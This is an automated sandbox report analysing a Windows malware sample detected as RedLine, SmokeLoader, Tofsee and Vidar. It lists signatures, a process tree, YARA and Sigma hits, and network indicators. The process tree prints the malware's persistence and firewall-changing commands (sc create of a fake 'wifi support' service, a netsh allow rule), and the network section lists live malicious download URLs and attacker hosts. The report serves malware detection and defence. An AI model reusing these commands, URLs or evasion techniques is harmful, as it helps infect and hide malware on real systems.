Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report nkINykHreE.exe

Overview

General Information

Sample Name:nkINykHreE.exe
Analysis ID:547895
MD5:dc67c627917ff9724f3c1e6db5f2dc27
SHA1:4b7528999ad6095b3fbb3aec059efb88d999ea95
SHA256:26a4c5b36d9fde80ea47137eb53b40dacf240432a5895f98417eae51b6b681da
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade analysis by execution special instruction which cause usermode exception
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Checks for debuggers (devices)
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • nkINykHreE.exe (PID: 800 cmdline: "C:\Users\user\Desktop\nkINykHreE.exe" MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
    • nkINykHreE.exe (PID: 3092 cmdline: "C:\Users\user\Desktop\nkINykHreE.exe" MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 115B.exe (PID: 340 cmdline: C:\Users\user\AppData\Local\Temp\115B.exe MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
          • 115B.exe (PID: 1412 cmdline: C:\Users\user\AppData\Local\Temp\115B.exe MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
        • 2997.exe (PID: 6936 cmdline: C:\Users\user\AppData\Local\Temp\2997.exe MD5: 1F935BFFF0F8128972BC69625E5B2A6C)
        • 18D.exe (PID: 4992 cmdline: C:\Users\user\AppData\Local\Temp\18D.exe MD5: B7B184D2B0910148CABB9B5E915753D6)
          • cmd.exe (PID: 6552 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 1768 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2856 cmdline: C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 3952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4784 cmdline: C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6404 cmdline: "C:\Windows\System32\sc.exe" start dbgxuqbr MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 7000 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • CBA.exe (PID: 5652 cmdline: C:\Users\user\AppData\Local\Temp\CBA.exe MD5: 6C72997AA5DD44A44B27BD36347BAED9)
          • CBA.exe (PID: 7052 cmdline: C:\Users\user\AppData\Local\Temp\CBA.exe MD5: 6C72997AA5DD44A44B27BD36347BAED9)
        • 2757.exe (PID: 2904 cmdline: C:\Users\user\AppData\Local\Temp\2757.exe MD5: 67B848B139E584BF3361A51160FC6731)
        • 4187.exe (PID: 6064 cmdline: C:\Users\user\AppData\Local\Temp\4187.exe MD5: C085684DB882063C21F18D251679B0CC)
        • 13E0.exe (PID: 3952 cmdline: C:\Users\user\AppData\Local\Temp\13E0.exe MD5: AA519DEEB511E886E73F8E0256180800)
        • 1B15.exe (PID: 6380 cmdline: C:\Users\user\AppData\Local\Temp\1B15.exe MD5: D8B78E7D4D822C10CCE3654D7F9E4931)
        • 28C2.exe (PID: 6488 cmdline: C:\Users\user\AppData\Local\Temp\28C2.exe MD5: F111EE7C9F26F50F9EFEEB6EF6C32A3C)
        • 315E.exe (PID: 7032 cmdline: C:\Users\user\AppData\Local\Temp\315E.exe MD5: 4FB3361FFC7E5DD2FAD4413866DB6D2E)
        • 4583.exe (PID: 4784 cmdline: C:\Users\user\AppData\Local\Temp\4583.exe MD5: 11124BB02075AD2D9D750343B42F932A)
  • svchost.exe (PID: 6444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6720 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6816 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6868 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6888 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4176 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • haifbcd (PID: 2908 cmdline: C:\Users\user\AppData\Roaming\haifbcd MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
    • haifbcd (PID: 4544 cmdline: C:\Users\user\AppData\Roaming\haifbcd MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
  • sdiimdop.exe (PID: 4560 cmdline: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe" MD5: F548B3529CA470C25E50AF6220AD3098)
    • svchost.exe (PID: 5180 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 7064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • scifbcd (PID: 6852 cmdline: C:\Users\user\AppData\Roaming\scifbcd MD5: 1F935BFFF0F8128972BC69625E5B2A6C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000031.00000002.609571282.0000000003AA7000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 46 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.nkINykHreE.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              18.2.18D.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                31.2.sdiimdop.exe.540e50.1.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                  13.2.haifbcd.4715a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    34.2.svchost.exe.2bb0000.0.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                      Click to see the 24 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspect Svchost ActivityShow sources
                      Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe", ParentImage: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe, ParentProcessId: 4560, ProcessCommandLine: svchost.exe, ProcessId: 5180
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\18D.exe, ParentImage: C:\Users\user\AppData\Local\Temp\18D.exe, ParentProcessId: 4992, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\, ProcessId: 1768
                      Sigma detected: Suspicious Svchost ProcessShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe", ParentImage: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe, ParentProcessId: 4560, ProcessCommandLine: svchost.exe, ProcessId: 5180
                      Sigma detected: Netsh Port or Application AllowedShow sources
                      Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\18D.exe, ParentImage: C:\Users\user\AppData\Local\Temp\18D.exe, ParentProcessId: 4992, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 7000
                      Sigma detected: New Service CreationShow sources
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\18D.exe, ParentImage: C:\Users\user\AppData\Local\Temp\18D.exe, ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 2856

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                      Source: http://65.108.180.72/msvcp140.dllAvira URL Cloud: Label: malware
                      Source: http://91.243.44.130/stlr/maps.exeAvira URL Cloud: Label: malware
                      Source: http://65.108.180.72/mozglue.dllAvira URL Cloud: Label: malware
                      Source: http://91.219.236.18/capibarlAvira URL Cloud: Label: phishing
                      Source: http://privacytools-foryou-777.com/downloads/toolspab2.exeAvira URL Cloud: Label: malware
                      Source: http://65.108.180.72/freebl3.dllAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/8584_1641133152_551.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/game.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/2184_1641247228_8717.exeAvira URL Cloud: Label: malware
                      Source: http://91.219.236.18/3Avira URL Cloud: Label: phishing
                      Source: http://194.180.174.53/capibar0Avira URL Cloud: Label: phishing
                      Source: http://unic11m.top/install1.exeAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: nkINykHreE.exeVirustotal: Detection: 25%Perma Link
                      Source: nkINykHreE.exeReversingLabs: Detection: 25%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://65.108.180.72/msvcp140.dllVirustotal: Detection: 9%Perma Link
                      Source: http://91.243.44.130/stlr/maps.exeVirustotal: Detection: 8%Perma Link
                      Source: http://65.108.180.72/mozglue.dllVirustotal: Detection: 10%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: nkINykHreE.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\scifbcdJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\4187.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\315E.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\4BED.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\1B15.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\28C2.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\4583.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\haifbcdJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\sdiimdop.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeJoe Sandbox ML: detected
                      Source: 31.2.sdiimdop.exe.540e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 31.3.sdiimdop.exe.570000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 34.2.svchost.exe.2bb0000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 31.2.sdiimdop.exe.600000.2.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 18.3.18D.exe.560000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 39.2.2757.exe.1150000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 18.2.18D.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 18.2.18D.exe.540e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 31.2.sdiimdop.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeUnpacked PE file: 18.2.18D.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeUnpacked PE file: 31.2.sdiimdop.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\4187.exeUnpacked PE file: 42.2.4187.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\4187.exeUnpacked PE file: 42.2.4187.exe.400000.0.unpack
                      Source: nkINykHreE.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.5:49842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49851 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.5:49852 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.5:49856 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49864 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49866 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.240.190.72:443 -> 192.168.2.5:49882 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.248.232.78:443 -> 192.168.2.5:49887 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.248.232.78:443 -> 192.168.2.5:49889 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 116.202.14.219:443 -> 192.168.2.5:49894 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 51.91.13.105:443 -> 192.168.2.5:49895 version: TLS 1.2
                      Source: Binary string: C:\hatisicovapehe\p.pdb source: 2997.exe, 2997.exe, 00000011.00000002.369808653.0000000000409000.00000020.00020000.sdmp, 2997.exe, 00000011.00000000.353771272.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\vuyeguw\zofaxekax.pdb source: nkINykHreE.exe, nkINykHreE.exe, 00000000.00000000.237076372.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000000.00000002.243796103.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000001.00000000.241917269.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000002.340276141.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000000.331309043.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000000.333118920.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000002.341669958.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000F.00000000.337510866.0000000000401000.00000020.00020000.sdmp, 115B.exe, 00000010.00000000.338143119.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\gilos\ye.pdb source: 18D.exe, 00000012.00000002.391234957.0000000000782000.00000004.00000001.sdmp, 18D.exe, 00000012.00000000.365358490.0000000000401000.00000020.00020000.sdmp, sdiimdop.exe, 0000001F.00000000.391356677.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.465105222.0000000003258000.00000004.00000001.sdmp
                      Source: Binary string: i6`C:\vuyeguw\zofaxekax.pdbhQD source: nkINykHreE.exe, 00000000.00000000.237076372.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000000.00000002.243796103.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000001.00000000.241917269.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000002.340276141.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000000.331309043.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000000.333118920.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000002.341669958.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000F.00000000.337510866.0000000000401000.00000020.00020000.sdmp, 115B.exe, 00000010.00000000.338143119.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: kJC:\tozeroc-watege99_zaga\vifalaro.pdb source: 4187.exe, 0000002A.00000003.446573203.0000000000CB0000.00000004.00000001.sdmp
                      Source: Binary string: ZC:\gilos\ye.pdbhQD source: 18D.exe, 00000012.00000002.391234957.0000000000782000.00000004.00000001.sdmp, 18D.exe, 00000012.00000000.365358490.0000000000401000.00000020.00020000.sdmp, sdiimdop.exe, 0000001F.00000000.391356677.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.465105222.0000000003258000.00000004.00000001.sdmp
                      Source: Binary string: VC:\hatisicovapehe\p.pdb source: 2997.exe, 00000011.00000002.369808653.0000000000409000.00000020.00020000.sdmp, 2997.exe, 00000011.00000000.353771272.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\tozeroc-watege99_zaga\vifalaro.pdb source: 4187.exe, 0000002A.00000003.446573203.0000000000CB0000.00000004.00000001.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.5:49897 -> 65.108.180.72:80
                      Source: TrafficSnort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.5:49898 -> 116.202.186.120:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.87.235.183 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.1 25
                      Source: C:\Windows\explorer.exeDomain query: bitly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: amogohuigotuli.at
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: f0616068.xsph.ru
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exeDomain query: unic11m.top
                      Source: C:\Windows\explorer.exeDomain query: vk.com
                      Source: C:\Windows\explorer.exeDomain query: www.mediafire.com
                      Source: C:\Windows\explorer.exeDomain query: natribu.org
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeDomain query: srtuiyhuali.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeDomain query: fufuiloirtu.com
                      Source: C:\Windows\explorer.exeDomain query: bit.ly
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
